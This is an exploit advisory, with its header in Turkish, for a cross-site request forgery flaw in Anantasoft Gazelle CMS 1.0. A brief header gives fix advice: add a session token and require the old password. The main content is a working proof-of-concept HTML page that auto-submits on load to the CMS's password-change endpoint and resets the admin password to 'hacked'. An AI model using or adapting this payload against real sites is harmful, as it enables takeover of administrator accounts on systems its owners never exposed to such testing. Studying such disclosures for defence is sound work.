< ------------------- header data start ------------------- >

#############################################################

# Application Name : Anantasoft Gazelle CMS 1.0

# Vulnerable Type : Xsrf

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<bOdy onload=Submit();>
<script>function Submit(){document.frm.submit();}</script>
<form name=frm action=http://demo.opensourcecms.com/gazelle/change.php method=post>
<label for=name>username: </label>
<input type=hidden id=name name=name value=admin />
<label for=pass>password: </label>
<input type=password id=pass name=pass value=hacked/>
<label for=controle>password (again): </label>
<input type=password id=controle name=controle value=hacked/>
<label for=email>Email address: </label>
<input type=hidden id=email name=email value=[email protected] />
<input type=submit name=save value=Save class=button />
<input type=hidden name=table value=users />
<input type=hidden name=number value=1 />
<input type=hidden name=active value=1 />
</form>


< -- bug code end of -- >